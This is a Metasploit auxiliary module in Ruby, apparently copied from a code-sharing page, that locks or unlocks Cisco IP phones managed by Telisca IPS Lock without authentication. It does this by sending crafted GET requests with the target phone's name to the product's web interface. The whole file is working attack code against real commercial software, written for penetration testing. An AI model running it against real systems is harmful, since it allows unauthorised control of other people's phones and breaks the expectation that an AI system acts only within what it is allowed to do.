Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'Telisca IPS Lock Cisco IP Phone Control',
12
      'Description'    => %q{
13
        This module allows an unauthenticated attacker to exercise the
14
        "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP
15
        Phones. This module should be run in the VoIP VLAN, and requires
16
        knowledge of the target phone's name (for example, SEP002497AB1D4B).
17

18
        Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.
19
      },
20
      'References'     =>
21
        [
22
          # Publicly disclosed via Metasploit PR
23
          'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'
24
        ],
25
      'Author'         =>
26
        [
27
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
28
          'zirsalem'
29
        ],
30
      'License'        => MSF_LICENSE,
31
      'DisclosureDate' => '2015-12-17',
32
      'Actions'        =>
33
       [
34
         ['LOCK', 'Description' => 'To lock a phone'],
35
         ['UNLOCK', 'Description' => 'To unlock a phone']
36
       ],
37
       'DefaultAction' => 'UNLOCK'
38
    ))
39

40
    register_options(
41
      [
42
        OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),
43
        OptString.new('PHONENAME', [true, 'The name of the target phone'])
44
      ])
45

46
  end
47

48
  def print_status(msg='')
49
    super("#{peer} - #{msg}")
50
  end
51

52
  def print_good(msg='')
53
    super("#{peer} - #{msg}")
54
  end
55

56
  def print_error(msg='')
57
    super("#{peer} - #{msg}")
58
  end
59

60
  # Returns the status of the listening port.
61
  #
62
  # @return [Boolean] TrueClass if port open, otherwise FalseClass.
63
  def port_open?
64
    begin
65
      res = send_request_raw({'method' => 'GET', 'uri' => '/'})
66
      return true if res
67
    rescue ::Rex::ConnectionRefused
68
      vprint_status("Connection refused")
69
    rescue ::Rex::ConnectionError
70
      vprint_error("Connection failed")
71
    rescue ::OpenSSL::SSL::SSLError
72
      vprint_error("SSL/TLS connection error")
73
    end
74

75
    false
76
  end
77

78
  # Locks a device.
79
  #
80
  # @param phone_name [String] Name of the phone used for the pn parameter.
81
  #
82
  # @return [void]
83
  def lock(phone_name)
84
    res = send_request_cgi({
85
      'method'    => 'GET',
86
      'uri'       => '/IPSPCFG/user/Default.aspx',
87
      'headers'   => {
88
        'Connection' => 'keep-alive',
89
        'Accept-Language' => 'en-US,en;q=0.5'
90
      },
91
      'vars_get'  => {
92
        'action'  => 'DO',
93
        'tg' => 'L',
94
        'pn' => phone_name,
95
        'dp' => '',
96
        'gr' => '',
97
        'gl' => ''
98
      }
99
    })
100

101
    if res && res.code == 200
102
      if res.body.include?('Unlock') || res.body.include?('U7LCK')
103
        print_good("The device #{phone_name} is already locked")
104
      elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')
105
        print_good("Device #{phone_name} successfully locked")
106
      end
107
    elsif res
108
      print_error("Unexpected response #{res.code}")
109
    else
110
      print_error('The connection timed out while trying to lock.')
111
    end
112
  end
113

114

115
  # Unlocks a phone.
116
  #
117
  # @param phone_name [String] Name of the phone used for the pn parameter.
118
  #
119
  # @return [void]
120
  def unlock(phone_name)
121
    res = send_request_cgi({
122
      'method'    => 'GET',
123
      'uri'       => '/IPSPCFG/user/Default.aspx',
124
      'headers'   => {
125
        'Connection' => 'keep-alive',
126
        'Accept-Language' => 'en-US,en;q=0.5'
127
      },
128
      'vars_get' => {
129
        'action' => 'U7LCK',
130
        'pn'     => phone_name,
131
        'dp'     => ''
132
      }
133
    })
134

135
    if res && res.code == 200
136
      if res.body.include?('Unlock') || res.body.include?('U7LCK')
137
        print_good("The device #{phone_name} is already locked")
138
      elsif res.body.include?('unlocked') || res.body.include?('QUIT')
139
        print_good("The device #{phone_name} successfully unlocked")
140
      end
141
    elsif res
142
      print_error("Unexpected response #{res.code}")
143
    else
144
      print_error('The connection timed out while trying to unlock')
145
    end
146
  end
147

148

149
  def run
150
    unless port_open?
151
      print_error('The web server is unreachable!')
152
      return
153
    end
154

155
    phone_name = datastore['PHONENAME']
156
    case action.name
157
      when 'LOCK'
158
        lock(phone_name)
159
      when 'UNLOCK'
160
        unlock(phone_name)
161
    end
162
  end
163
end
164

165